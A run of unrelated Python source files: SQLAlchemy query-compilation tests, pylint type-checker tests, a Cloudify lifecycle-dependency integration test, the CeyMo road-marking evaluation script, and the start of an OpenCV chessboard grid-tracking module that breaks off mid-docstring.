self._assert_where_all_correlated( select([t1, t2]).where(t2.c.a == s1.correlate(t1, t2)) ) def test_correlate_all_column(self): t1, t2, s1 = self._fixture() self._assert_column_all_correlated( select([t1, t2, s1.correlate(t1, t2).as_scalar()]) ) def test_correlate_all_from(self): t1, t2, s1 = self._fixture() self._assert_from_all_uncorrelated( select([t1, t2, s1.correlate(t1, t2).alias()]) ) def test_correlate_where_all_unintentional(self): t1, t2, s1 = self._fixture() assert_raises_message( exc.InvalidRequestError, "returned no FROM clauses due to auto-correlation", select([t1, t2]).where(t2.c.a == s1).compile, ) def test_correlate_from_all_ok(self): t1, t2, s1 = self._fixture() self.assert_compile( select([t1, t2, s1]), "SELECT t1.a, t2.a, a FROM t1, t2, " "(SELECT t1.a AS a FROM t1, t2 WHERE t1.a = t2.a)", ) def test_correlate_auto_where_singlefrom(self): t1, t2, s1 = self._fixture() s = select([t1.c.a]) s2 = select([t1]).where(t1.c.a == s) self.assert_compile( s2, "SELECT t1.a FROM t1 WHERE t1.a = " "(SELECT t1.a FROM t1)" ) def test_correlate_semiauto_where_singlefrom(self): t1, t2, s1 = self._fixture() s = select([t1.c.a]) s2 = select([t1]).where(t1.c.a == s.correlate(t1)) self._assert_where_single_full_correlated(s2) def test_correlate_except_semiauto_where_singlefrom(self): t1, t2, s1 = self._fixture() s = select([t1.c.a]) s2 = select([t1]).where(t1.c.a == s.correlate_except(t2)) self._assert_where_single_full_correlated(s2) def test_correlate_alone_noeffect(self): # new as of #2668 t1, t2, s1 = self._fixture() self.assert_compile( s1.correlate(t1, t2), "SELECT t1.a FROM t1, t2 WHERE t1.a = t2.a" ) def test_correlate_except_froms(self): # new as of #2748 t1 = table("t1", column("a")) t2 = table("t2", column("a"), column("b")) s = select([t2.c.b]).where(t1.c.a == t2.c.a) s = s.correlate_except(t2).alias("s") s2 = select([func.foo(s.c.b)]).as_scalar() s3 = select([t1], order_by=s2) self.assert_compile( s3, "SELECT t1.a FROM t1 ORDER BY " "(SELECT foo(s.b) AS foo_1 FROM " "(SELECT t2.b AS b FROM t2 WHERE t1.a = t2.a) AS s)", ) def test_multilevel_froms_correlation(self): # new as of #2748 p = table("parent", column("id")) c = table("child", column("id"), column("parent_id"), column("pos")) s = ( c.select() .where(c.c.parent_id == p.c.id) .order_by(c.c.pos) .limit(1) ) s = s.correlate(p) s = exists().select_from(s).where(s.c.id == 1) s = select([p]).where(s) self.assert_compile( s, "SELECT parent.id FROM parent WHERE EXISTS (SELECT * " "FROM (SELECT child.id AS id, child.parent_id AS parent_id, " "child.pos AS pos FROM child WHERE child.parent_id = parent.id " "ORDER BY child.pos LIMIT :param_1) WHERE id = :id_1)", ) def test_no_contextless_correlate_except(self): # new as of #2748 t1 = table("t1", column("x")) t2 = table("t2", column("y")) t3 = table("t3", column("z")) s = ( select([t1]) .where(t1.c.x == t2.c.y) .where(t2.c.y == t3.c.z) .correlate_except(t1) ) self.assert_compile( s, "SELECT t1.x FROM t1, t2, t3 WHERE t1.x = t2.y AND t2.y = t3.z" ) def test_multilevel_implicit_correlation_disabled(self): # test that implicit correlation with multilevel WHERE correlation # behaves like 0.8.1, 0.7 (i.e. doesn't happen) t1 = table("t1", column("x")) t2 = table("t2", column("y")) t3 = table("t3", column("z")) s = select([t1.c.x]).where(t1.c.x == t2.c.y) s2 = select([t3.c.z]).where(t3.c.z == s.as_scalar()) s3 = select([t1]).where(t1.c.x == s2.as_scalar()) self.assert_compile( s3, "SELECT t1.x FROM t1 " "WHERE t1.x = (SELECT t3.z " "FROM t3 " "WHERE t3.z = (SELECT t1.x " "FROM t1, t2 " "WHERE t1.x = t2.y))", ) def test_from_implicit_correlation_disabled(self): # test that implicit correlation with immediate and # multilevel FROM clauses behaves like 0.8.1 (i.e. doesn't happen) t1 = table("t1", column("x")) t2 = table("t2", column("y")) s = select([t1.c.x]).where(t1.c.x == t2.c.y) s2 = select([t2, s]) s3 = select([t1, s2]) self.assert_compile( s3, "SELECT t1.x, y, x FROM t1, " "(SELECT t2.y AS y, x FROM t2, " "(SELECT t1.x AS x FROM t1, t2 WHERE t1.x = t2.y))", ) class CoercionTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = default.DefaultDialect(supports_native_boolean=True) def _fixture(self): m = MetaData() return Table("foo", m, Column("id", Integer)) bool_table = table("t", column("x", Boolean)) def test_coerce_bool_where(self): self.assert_compile( select([self.bool_table]).where(self.bool_table.c.x), "SELECT t.x FROM t WHERE t.x", ) def test_coerce_bool_where_non_native(self): self.assert_compile( select([self.bool_table]).where(self.bool_table.c.x), "SELECT t.x FROM t WHERE t.x = 1", dialect=default.DefaultDialect(supports_native_boolean=False), ) self.assert_compile( select([self.bool_table]).where(~self.bool_table.c.x), "SELECT t.x FROM t WHERE t.x = 0", dialect=default.DefaultDialect(supports_native_boolean=False), ) def test_null_constant(self): self.assert_compile(_literal_as_text(None), "NULL") def test_false_constant(self): self.assert_compile(_literal_as_text(False), "false") def test_true_constant(self): self.assert_compile(_literal_as_text(True), "true") def test_val_and_false(self): t = self._fixture() self.assert_compile(and_(t.c.id == 1, False), "false") def test_val_and_true_coerced(self): t = self._fixture() self.assert_compile(and_(t.c.id == 1, True), "foo.id = :id_1") def test_val_is_null_coerced(self): t = self._fixture() self.assert_compile(and_(t.c.id == None), "foo.id IS NULL") # noqa def test_val_and_None(self): t = self._fixture() self.assert_compile(and_(t.c.id == 1, None), "foo.id = :id_1 AND NULL") def test_None_and_val(self): t = self._fixture() self.assert_compile(and_(None, t.c.id == 1), "NULL AND foo.id = :id_1") def test_None_and_nothing(self): # current convention is None in and_() # returns None May want # to revise this at some point. self.assert_compile(and_(None), "NULL") def test_val_and_null(self): t = self._fixture() self.assert_compile( and_(t.c.id == 1, null()), "foo.id = :id_1 AND NULL" ) class ResultMapTest(fixtures.TestBase): """test the behavior of the 'entry stack' and the determination when the result_map needs to be populated. """ def test_compound_populates(self): t = Table("t", MetaData(), Column("a", Integer), Column("b", Integer)) stmt = select([t]).union(select([t])) comp = stmt.compile() eq_( comp._create_result_map(), { "a": ("a", (t.c.a, "a", "a"), t.c.a.type), "b": ("b", (t.c.b, "b", "b"), t.c.b.type), }, ) def test_compound_not_toplevel_doesnt_populate(self): t = Table("t", MetaData(), Column("a", Integer), Column("b", Integer)) subq = select([t]).union(select([t])) stmt = select([t.c.a]).select_from(t.join(subq, t.c.a == subq.c.a)) comp = stmt.compile() eq_( comp._create_result_map(), {"a": ("a", (t.c.a, "a", "a"), t.c.a.type)}, ) def test_compound_only_top_populates(self): t = Table("t", MetaData(), Column("a", Integer), Column("b", Integer)) stmt = select([t.c.a]).union(select([t.c.b])) comp = stmt.compile() eq_( comp._create_result_map(), {"a": ("a", (t.c.a, "a", "a"), t.c.a.type)}, ) def test_label_plus_element(self): t = Table("t", MetaData(), Column("a", Integer)) l1 = t.c.a.label("bar") tc = type_coerce(t.c.a, String) stmt = select([t.c.a, l1, tc]) comp = stmt.compile() tc_anon_label = comp._create_result_map()["anon_1"][1][0] eq_( comp._create_result_map(), { "a": ("a", (t.c.a, "a", "a"), t.c.a.type), "bar": ("bar", (l1, "bar"), l1.type), "anon_1": ( "%%(%d anon)s" % id(tc), (tc_anon_label, "anon_1", tc), tc.type, ), }, ) def test_label_conflict_union(self): t1 = Table( "t1", MetaData(), Column("a", Integer), Column("b", Integer) ) t2 = Table("t2", MetaData(), Column("t1_a", Integer)) union = select([t2]).union(select([t2])).alias() t1_alias = t1.alias() stmt = ( select([t1, t1_alias]) .select_from(t1.join(union, t1.c.a == union.c.t1_a)) .apply_labels() ) comp = stmt.compile() eq_( set(comp._create_result_map()), set(["t1_1_b", "t1_1_a", "t1_a", "t1_b"]), ) is_(comp._create_result_map()["t1_a"][1][2], t1.c.a) def test_insert_with_select_values(self): astring = Column("a", String) aint = Column("a", Integer) m = MetaData() Table("t1", m, astring) t2 = Table("t2", m, aint) stmt = t2.insert().values(a=select([astring])).returning(aint) comp = stmt.compile(dialect=postgresql.dialect()) eq_( comp._create_result_map(), {"a": ("a", (aint, "a", "a"), aint.type)}, ) def test_insert_from_select(self): astring = Column("a", String) aint = Column("a", Integer) m = MetaData() Table("t1", m, astring) t2 = Table("t2", m, aint) stmt = ( t2.insert().from_select(["a"], select([astring])).returning(aint) ) comp = stmt.compile(dialect=postgresql.dialect()) eq_( comp._create_result_map(), {"a": ("a", (aint, "a", "a"), aint.type)}, ) def test_nested_api(self): from sqlalchemy.engine.result import ResultMetaData stmt2 = select([table2]) stmt1 = select([table1]).select_from(stmt2) contexts = {} int_ = Integer() class MyCompiler(compiler.SQLCompiler): def visit_select(self, stmt, *arg, **kw): if stmt is stmt2: with self._nested_result() as nested: contexts[stmt2] = nested text = super(MyCompiler, self).visit_select(stmt2) self._add_to_result_map("k1", "k1", (1, 2, 3), int_) else: text = super(MyCompiler, self).visit_select( stmt, *arg, **kw ) self._add_to_result_map("k2", "k2", (3, 4, 5), int_) return text comp = MyCompiler(default.DefaultDialect(), stmt1) eq_( ResultMetaData._create_result_map(contexts[stmt2][0]), { "otherid": ( "otherid", (table2.c.otherid, "otherid", "otherid"), table2.c.otherid.type, ), "othername": ( "othername", (table2.c.othername, "othername", "othername"), table2.c.othername.type, ), "k1": ("k1", (1, 2, 3), int_), }, ) eq_( comp._create_result_map(), { "myid": ( "myid", (table1.c.myid, "myid", "myid"), table1.c.myid.type, ), "k2": ("k2", (3, 4, 5), int_), "name": ( "name", (table1.c.name, "name", "name"), table1.c.name.type, ), "description": ( "description", (table1.c.description, "description", "description"), table1.c.description.type, ), }, ) def test_select_wraps_for_translate_ambiguity(self): # test for issue #3657 t = table("a", column("x"), column("y"), column("z")) l1, l2, l3 = t.c.z.label("a"), t.c.x.label("b"), t.c.x.label("c") orig = [t.c.x, t.c.y, l1, l2, l3] stmt = select(orig) wrapped = stmt._generate() wrapped = wrapped.column( func.ROW_NUMBER().over(order_by=t.c.z) ).alias() wrapped_again = select([c for c in wrapped.c]) compiled = wrapped_again.compile( compile_kwargs={"select_wraps_for": stmt} ) proxied = [obj[0] for (k, n, obj, type_) in compiled._result_columns] for orig_obj, proxied_obj in zip(orig, proxied): is_(orig_obj, proxied_obj) def test_select_wraps_for_translate_ambiguity_dupe_cols(self): # test for issue #3657 t = table("a", column("x"), column("y"), column("z")) l1, l2, l3 = t.c.z.label("a"), t.c.x.label("b"), t.c.x.label("c") orig = [t.c.x, t.c.y, l1, l2, l3] # create the statement with some duplicate columns. right now # the behavior is that these redundant columns are deduped. stmt = select([t.c.x, t.c.y, l1, t.c.y, l2, t.c.x, l3]) # so the statement has 7 inner columns... eq_(len(list(stmt.inner_columns)), 7) # but only exposes 5 of them, the other two are dupes of x and y eq_(len(stmt.c), 5) # and when it generates a SELECT it will also render only 5 eq_(len(stmt._columns_plus_names), 5) wrapped = stmt._generate() wrapped = wrapped.column( func.ROW_NUMBER().over(order_by=t.c.z) ).alias() # so when we wrap here we're going to have only 5 columns wrapped_again = select([c for c in wrapped.c]) # so the compiler logic that matches up the "wrapper" to the # "select_wraps_for" can't use inner_columns to match because # these collections are not the same compiled = wrapped_again.compile( compile_kwargs={"select_wraps_for": stmt} ) proxied = [obj[0] for (k, n, obj, type_) in compiled._result_columns] for orig_obj, proxied_obj in zip(orig, proxied): is_(orig_obj, proxied_obj)
# Copyright (c) 2003-2016 LOGILAB S.A. (Paris, FRANCE). # http://www.logilab.fr/ -- mailto:<EMAIL> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/master/COPYING """Unittest for the type checker.""" import unittest from astroid import test_utils from pylint.checkers import typecheck from pylint.testutils import CheckerTestCase, Message, set_config class TypeCheckerTest(CheckerTestCase): "Tests for pylint.checkers.typecheck" CHECKER_CLASS = typecheck.TypeChecker def test_no_member_in_getattr(self): """Make sure that a module attribute access is checked by pylint. """ node = test_utils.extract_node(""" import optparse optparse.THIS_does_not_EXIST """) with self.assertAddsMessages( Message( 'no-member', node=node, args=('Module', 'optparse', 'THIS_does_not_EXIST'))): self.checker.visit_attribute(node) @set_config(ignored_modules=('argparse',)) def test_no_member_in_getattr_ignored(self): """Make sure that a module attribute access check is omitted with a module that is configured to be ignored. """ node = test_utils.extract_node(""" import argparse argparse.THIS_does_not_EXIST """) with self.assertNoMessages(): self.checker.visit_attribute(node) @set_config(ignored_classes=('xml.etree.', )) def test_ignored_modules_invalid_pattern(self): node = test_utils.extract_node(''' import xml xml.etree.Lala ''') message = Message('no-member', node=node, args=('Module', 'xml.etree', 'Lala')) with self.assertAddsMessages(message): self.checker.visit_attribute(node) @set_config(ignored_modules=('xml.etree*', )) def test_ignored_modules_patterns(self): node = test_utils.extract_node(''' import xml xml.etree.portocola #@ ''') with self.assertNoMessages(): self.checker.visit_attribute(node) @set_config(ignored_classes=('xml.*', )) def test_ignored_classes_no_recursive_pattern(self): node = test_utils.extract_node(''' import xml xml.etree.ElementTree.Test ''') message = Message('no-member', node=node, args=('Module', 'xml.etree.ElementTree', 'Test')) with self.assertAddsMessages(message): self.checker.visit_attribute(node) @set_config(ignored_classes=('optparse.Values', )) def test_ignored_classes_qualified_name(self): """Test that ignored-classes supports qualified name for ignoring.""" node = test_utils.extract_node(''' import optparse optparse.Values.lala ''') with self.assertNoMessages(): self.checker.visit_attribute(node) @set_config(ignored_classes=('Values', )) def test_ignored_classes_only_name(self): """Test that ignored_classes works with the name only.""" node = test_utils.extract_node(''' import optparse optparse.Values.lala ''') with self.assertNoMessages(): self.checker.visit_attribute(node) @set_config(contextmanager_decorators=('contextlib.contextmanager', '.custom_contextmanager')) def test_custom_context_manager(self): """Test that @custom_contextmanager is recognized as configured.""" node = test_utils.extract_node(''' from contextlib import contextmanager def custom_contextmanager(f): return contextmanager(f) @custom_contextmanager def dec(): yield with dec(): pass ''') with self.assertNoMessages(): self.checker.visit_with(node) if __name__ == '__main__': unittest.main()
<filename>tests/integration_tests/tests/agentless_tests/test_depends_on_lifecycle_operation.py ######## # Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import uuid import pytest from integration_tests import AgentlessTestCase from integration_tests.tests import utils pytestmark = pytest.mark.group_workflows @pytest.mark.usefixtures('mock_workflows_plugin') class DependsOnLifecycleOperationTest(AgentlessTestCase): @staticmethod def generate_blueprint(depended_on_operation): return """ tosca_definitions_version: cloudify_dsl_1_3 imports: - cloudify/types/types.yaml - wf--blueprint:mock_workflows node_templates: node: type: cloudify.nodes.Root interfaces: cloudify.interfaces.lifecycle: precreate: wf--mock_workflows.mock_workflows.workflows.do_nothing configure: wf--mock_workflows.mock_workflows.workflows.do_nothing create: wf--mock_workflows.mock_workflows.workflows.do_nothing start: wf--mock_workflows.mock_workflows.workflows.do_nothing depends_on_operation_node: type: cloudify.nodes.Root relationships: - type: cloudify.relationships.depends_on_lifecycle_operation target: node properties: operation: {0} interfaces: cloudify.interfaces.lifecycle: precreate: wf--mock_workflows.mock_workflows.workflows.do_nothing configure: wf--mock_workflows.mock_workflows.workflows.do_nothing create: wf--mock_workflows.mock_workflows.workflows.do_nothing start: wf--mock_workflows.mock_workflows.workflows.do_nothing """.format(depended_on_operation) def _test_full_flow(self, expected_info, tested_operation): self.assertIsInstance(expected_info, list) base_blueprint_path = utils.get_resource('dsl/mock_workflows.yaml') self.client.blueprints.upload(base_blueprint_path, 'mock_workflows') utils.wait_for_blueprint_upload('mock_workflows', self.client) deployment_id = 'd{0}'.format(uuid.uuid4()) main_blueprint = self.generate_blueprint(tested_operation) main_blueprint_path = self.make_yaml_file(main_blueprint) _, execution_id = self.deploy_application(main_blueprint_path, deployment_id=deployment_id) task_graphs = self.client.tasks_graphs.list(execution_id, 'install') operations_info = {} operations_id = {} for graph in task_graphs: operations = self.client.operations.list(graph.id) for op in operations: operations_id[op.id] = {} operations_id[op.id]['dependencies'] = op.dependencies operations_id[op.id]['info'] = op.info try: cloudify_context = op.parameters['task_kwargs'][ 'kwargs']['__cloudify_context'] except KeyError: continue op_name = cloudify_context['operation']['name'] node_name = cloudify_context['node_name'] operations_info[(op_name, node_name)] = op.containing_subgraph # Doest not matter from what operation the node's main subgraph id # will be taken from. install_depends_id = operations_info[ ('cloudify.interfaces.lifecycle.configure', 'depends_on_operation_node')] next_tasks_info = [operations_id[dep]['info'] for dep in operations_id[install_depends_id]['dependencies']] self.assertCountEqual(expected_info, next_tasks_info) def test_depends_on_precreate_operation(self): self._test_full_flow(['Node instance precreated'], 'precreate') def test_depends_on_configure_operation(self): self._test_full_flow(['Node instance configured', 'configured'], 'configure') def test_depends_on_create_operation(self): self._test_full_flow(['Node instance created', 'created'], 'create') def test_scaled_relationships(self): deployment_id = 'd{0}'.format(uuid.uuid4()) main_blueprint = self.generate_blueprint('create') + """ groups: group1: members: [node, depends_on_operation_node] policies: policy: type: cloudify.policies.scaling targets: [group1] properties: default_instances: 2 """ base_blueprint_path = utils.get_resource('dsl/mock_workflows.yaml') self.client.blueprints.upload(base_blueprint_path, 'mock_workflows') utils.wait_for_blueprint_upload('mock_workflows', self.client) main_blueprint_path = self.make_yaml_file(main_blueprint) _, execution_id = self.deploy_application(main_blueprint_path, deployment_id=deployment_id) task_graphs = self.client.tasks_graphs.list(execution_id, 'install') operations_info = {} operations_id = {} for graph in task_graphs: operations = self.client.operations.list(graph.id) for op in operations: operations_id[op.id] = {} operations_id[op.id]['dependencies'] = op.dependencies operations_id[op.id]['info'] = op.info try: cloudify_context = op.parameters['task_kwargs'][ 'kwargs']['__cloudify_context'] except KeyError: continue op_name = cloudify_context['operation']['name'] node_id = cloudify_context['node_id'] operations_info[(op_name, node_id)] = {} operations_info[(op_name, node_id)]['containing_subgraph']\ = op.containing_subgraph operations_info[(op_name, node_id)]['op_name'] = op_name install_subgraph_ids = [v['containing_subgraph'] for (__, node), v in operations_info.items() if ('depends_on_operation_node' in node and v['op_name'] == 'cloudify.interfaces.lifecycle.configure')] self.assertEqual(len(install_subgraph_ids), 2) for install_id in install_subgraph_ids: next_tasks_info = [operations_id[dep]['info'] for dep in operations_id[install_id]['dependencies']] self.assertCountEqual(['Node instance created', 'created'], next_tasks_info)
<reponame>oshadajay/CeyMo<gh_stars>10-100 ''' Evaluation script for the CeyMo Road Marking Dataset gt_dir should contain the ground truth json files and pred_dir should contain prediction json files respectively. The file system should follow the following order. home_directory/ |___ gt_dir/ | |___001.json | |___002.json | |___ .... |___ pred_dir/ |___001.json |___002.json |___ .... ''' from shapely.geometry import Polygon from tabulate import tabulate from os import listdir import json import argparse class_dict = {'SA':0, 'LA':0, 'RA':0, 'SLA':0, 'SRA':0, 'DM':0, 'PC':0, 'JB':0, 'SL':0, 'BL':0, 'CL':0} scene_dict = {'normal':0, 'crowded':0, 'dazzle light':0, 'night':0, 'rain':0, 'shadow':0} def get_IoU(pol_1, pol_2): # Define each polygon polygon1_shape = Polygon(pol_1) polygon2_shape = Polygon(pol_2) if ~(polygon1_shape.is_valid):polygon1_shape = polygon1_shape.buffer(0) if ~(polygon2_shape.is_valid):polygon2_shape = polygon2_shape.buffer(0) # Calculate intersection and union, and return IoU polygon_intersection = polygon1_shape.intersection(polygon2_shape).area polygon_union = polygon1_shape.area + polygon2_shape.area - polygon_intersection return polygon_intersection / polygon_union def match_gt_with_pred(gt_polygons, pred_polygons, iou_threshold): candidate_dict_gt = {} assigned_predictions = [] # Iterate over ground truth for idx_gt, gt_itm in enumerate(gt_polygons): pts_gt = gt_itm['points'] label_gt = gt_itm['label'] gt_candidate = {'label_pred':None, 'iou':0} assigned_prediction = None # Iterate over predictions for idx_pred, pred_itm in enumerate(pred_polygons): pts_pred = pred_itm['points'] label_pred = pred_itm['label'] iou = get_IoU(pts_pred, pts_gt) # Match gt with predicitons if (iou > iou_threshold) and (gt_candidate['iou'] < iou) and (label_gt == label_pred) and str(idx_pred) not in assigned_predictions: gt_candidate['label_pred'] = label_pred + '*' + str(idx_pred) gt_candidate['iou'] = iou assigned_prediction = str(idx_pred) if assigned_prediction is not None: assigned_predictions.append(assigned_prediction) candidate_dict_gt[label_gt + '*' + str(idx_gt)] = gt_candidate return candidate_dict_gt def eval_detections(gt_dir, pred_dir, iou_threshold = 0.3): gt_json_count = len([f for f in listdir(gt_dir) if f.endswith('.json')]) pred_json_count = len([f for f in listdir(pred_dir) if f.endswith('.json')]) assert gt_json_count == pred_json_count, "Ground truth json file count does not match with prediction json file count" print("Evaluating road marking detection performance on " + str(gt_json_count) + " files") print() classwise_results = [['Class', 'Precision', 'Recall', 'F1_Score']] scenariowise_results = [['Category', 'Precision', 'Recall', 'F1_Score']] filenames = [f for f in listdir(gt_dir) if f.endswith('.json')] sigma_tp = 0 sigma_fp = 0 sigma_fn = 0 tp_class_dict = class_dict.copy() gt_class_dict = class_dict.copy() pred_class_dict = class_dict.copy() tp_scenario_dict = scene_dict.copy() gt_scenario_dict = scene_dict.copy() pred_scenario_dict = scene_dict.copy() # Iterate over each file for file in filenames: # Load ground truth json file gt = open(gt_dir + '/' + file) gt_json = json.load(gt) gt.close() # Load pred json file pred = open(pred_dir + '/' + file) pred_json = json.load(pred) pred.close() gt_polygons = gt_json['shapes'] pred_polygons = pred_json['shapes'] scenario = gt_json['category'] for polygon in gt_polygons: gt_class_dict[polygon['label']] += 1 gt_scenario_dict[scenario] += 1 for polygon in pred_polygons: pred_class_dict[polygon['label']] += 1 pred_scenario_dict[scenario] += 1 tp_gt = 0 candidate_dict_gt = match_gt_with_pred(gt_polygons, pred_polygons, iou_threshold) for idx, lab in enumerate(candidate_dict_gt): label = lab.split('*')[0] pred_lab = candidate_dict_gt[lab]['label_pred'] if pred_lab != None: tp_gt += 1 tp_class_dict[label] += 1 tp_scenario_dict[scenario] += 1 tp = tp_gt fp = len(pred_polygons) - tp fn = len(gt_polygons) - tp sigma_tp += tp sigma_fp += fp sigma_fn += fn # Calculate precision, recall and F1 for the whole dataset if (sigma_tp + sigma_fp) != 0: precision = sigma_tp / (sigma_tp + sigma_fp) else: precision = 0 if (sigma_tp + sigma_fn) != 0: recall = sigma_tp / (sigma_tp + sigma_fn) else: recall = 0 if (precision + recall) != 0: F1_score = (2 * precision * recall) / (precision + recall) else: F1_score = 0 class_F1_scores_list = [] # Calculate class-wise performance metrics for label in tp_class_dict: l_tp = tp_class_dict[label] l_fp = pred_class_dict[label] - l_tp l_fn = gt_class_dict[label] - l_tp if (l_tp + l_fp) != 0: l_precision = l_tp / (l_tp + l_fp) else: l_precision = 0 if (l_tp + l_fn) != 0: l_recall = l_tp / (l_tp + l_fn) else: l_recall = 0 if (l_precision + l_recall) != 0: l_F1_score = (2 * l_precision * l_recall) / (l_precision + l_recall) else: l_F1_score = 0 classwise_results.append([label, round(l_precision, 4), round(l_recall, 4), round(l_F1_score, 4)]) class_F1_scores_list.append(l_F1_score) # Calculate scenario-wise performance metrics for scene in tp_scenario_dict: s_tp = tp_scenario_dict[scene] s_fp = pred_scenario_dict[scene] - s_tp s_fn = gt_scenario_dict[scene] - s_tp if (s_tp + s_fp) != 0: s_precision = s_tp / (s_tp + s_fp) else: s_precision = 0 if (s_tp + s_fn) != 0: s_recall = s_tp / (s_tp + s_fn) else: s_recall = 0 if (s_precision + s_recall) != 0: s_F1_score = (2 * s_precision * s_recall) / (s_precision + s_recall) else: s_F1_score = 0 scenariowise_results.append([scene, round(s_precision, 4), round(s_recall, 4), round(s_F1_score, 4)]) macro_F1_score = sum(class_F1_scores_list) / len(class_F1_scores_list) print('Class-wise road marking detection results') print(tabulate(classwise_results, headers='firstrow', tablefmt='grid')) print() print('Scenario-wise road marking detection results') print(tabulate(scenariowise_results, headers='firstrow', tablefmt='grid')) print() print("Overall Precision : " + str(round(precision, 4))) print("Overall Recall : " + str(round(recall, 4))) print("Overall F1-Score : " + str(round(F1_score, 4))) print("Macro F1-Score : " + str(round(macro_F1_score, 4))) def parse_opt(): parser = argparse.ArgumentParser() parser.add_argument('--gt_dir', type = str, help = 'Filepath containing ground truth json files') parser.add_argument('--pred_dir', type = str, help = 'Filepath containing prediction json files') parser.add_argument('--iou_threshold', type = float, default = 0.3, help = 'IoU threshold to count a prediction as a true positive') opt = parser.parse_args() return opt if __name__ == "__main__": opt = parse_opt() eval_detections(opt.gt_dir, opt.pred_dir, opt.iou_threshold)
<filename>robot2cam_calibration/track_grid.py """A function to track a grid and display its origin on the screen """ # The MIT License (MIT) # # Copyright (c) 2016 GTRC. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import cv2 import numpy as np import camera import json criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) class GridLocation(object): """Gets the location of a grid in an image and builds display images. Attributes: space: A float describing the spacing of the grid in mm rows: An int describing the number of rows of interior corners on the grid being tracked. cols: An int describing the number of columns of interior corners on the grid being tracked. opencv_windows_open: A boolean, whether the openCV display windows are open image: numpy.ndarray of the undistorted image result_image: numpy.ndarray of the final image, which is undistorted, has grid corners drawn on it, and has the grid coordinates drawn on it. object_point: numpy.ndarray of the real world coordinates of the grid in the grid's own coordinate system. axis: numpy.ndarry of the axis line points to draw, relative to the grid origin in the grid's coordinate system. intrinsic: A numpy array of the camera intrinsic matrix distortion: A numpy array of the camera distortion parameters """ def __init__(self, calibration, rows, cols, space, cam_name): """Initialize the GridLocation class. Reads in camera calibration info, sets up communications with the camera, and sets up the definition for an object point. Args: calibration (str): String of the file location of the camera . calibration data. The data should be stored as a JSON file with top level fields `intrinsic` which holds the intrinsic matrix as a list of lists and `distortion` which holds the distortion matrix as a list rows (int): The number of rows of interior corners on the grid cols (int): The number of columns of interior corners on the grid space (float): The spacing of corners on the grid Raises: ValueError: The number of rows and cols was the same """ # From args: self.space = space if rows == cols: raise ValueError('The grid mus be asymmetric. Rows cannot equal ' 'Columns') self.rows = rows self.cols = cols self.opencv_windows_open = False self.image = None self.result_image = None # Grid Info: self.object_point = np.zeros((self.cols * self.rows, 3), np.float32) self.object_point[:, :2] = (np.mgrid[ 0:(self.rows*self.space):self.space, 0:(self.cols*self.space):self.space] .T.reshape(-1, 2)) self.axis = np.float32([[3*self.space, 0, 0], [0, 3*self.space, 0], [0, 0, -3*self.space]]).reshape(-1, 3) # Calibration Data setup: with open(calibration, 'r') as calibration_file: calibration_dictionary = json.load(calibration_file) self.intrinsic = np.asarray(calibration_dictionary['intrinsic']) self.distortion = np.asarray(calibration_dictionary['distortion']) # Camera self.cam = camera.Camera(cam_name, self.intrinsic, self.distortion) print("done with init") def __del__(self): """Destroy this instance of the GridLocation class Closes any open OpenCV windows and closes the communications with the camera. """ cv2.destroyWindow('result') self.cam.__del__() def show_images(self): """Displays the images. If the windows have not yet been created, they are created. Note, there is a programmed 5 ms delay to allow the images to be shown. """ # OpenCV window and image setup: if not self.opencv_windows_open: cv2.namedWindow('result', cv2.WINDOW_NORMAL) self.opencv_windows_open = True cv2.waitKey(1) if self.result_image is not None: cv2.imshow('result', self.result_image) cv2.waitKey(5) def get_cam2grid(self): """Extract grid information from image and generate result image. Extract translation and rotation of grid from camera. Draw grid corners on result image. Draw grid pose on result image. Return camera to grid transformation matrix. Returns: 6 member list, translation matrix Raises: RuntimeError: Could not find a grid """ # Get new image self.image = self.cam.capture_image() # Find chessboard corners. re_projection_error, corners = cv2.findChessboardCorners( self.image, (self. rows, self.cols), flags=cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_ADAPTIVE_THRESH) if not re_projection_error: raise RuntimeError('unable to find grid') corners2 = cv2.cornerSubPix(self.image, corners, (11, 11), (-1, -1), criteria) if corners2 is None: corners2 = corners # Find the rotation and translation vectors. rvecs, tvecs, inliers = cv2.solvePnPRansac(self.object_point, corners2, self.intrinsic, self.distortion) # project 3D points to image plane image_points, jac = cv2.projectPoints(self.axis, rvecs, tvecs, self.intrinsic, self.distortion) self.result_image = cv2.cvtColor(self.image, cv2.COLOR_GRAY2RGB) temp_image = cv2.drawChessboardCorners(self.result_image, (self.cols, self.rows), corners2, re_projection_error) # OpenCV 2 vs 3 if temp_image is not None: self.result_image = temp_image self.result_image = draw_axes(self.result_image, corners2, image_points) return (np.concatenate((tvecs, rvecs), axis=0)).ravel().tolist() def __enter__(self): """Content manager entry point""" return self def __exit__(self, *_): """Content manager exit point""" self.__del__() def draw_axes(image_raw, corners, image_points, label=''): """Draw axes on an image Draw axes which will be centered at the first corner and oriented by the image points. Basic code from: http://docs.opencv.org/3.0-beta/doc/ py_tutorials/py_calib3d/py_pose/py_pose.html Args: 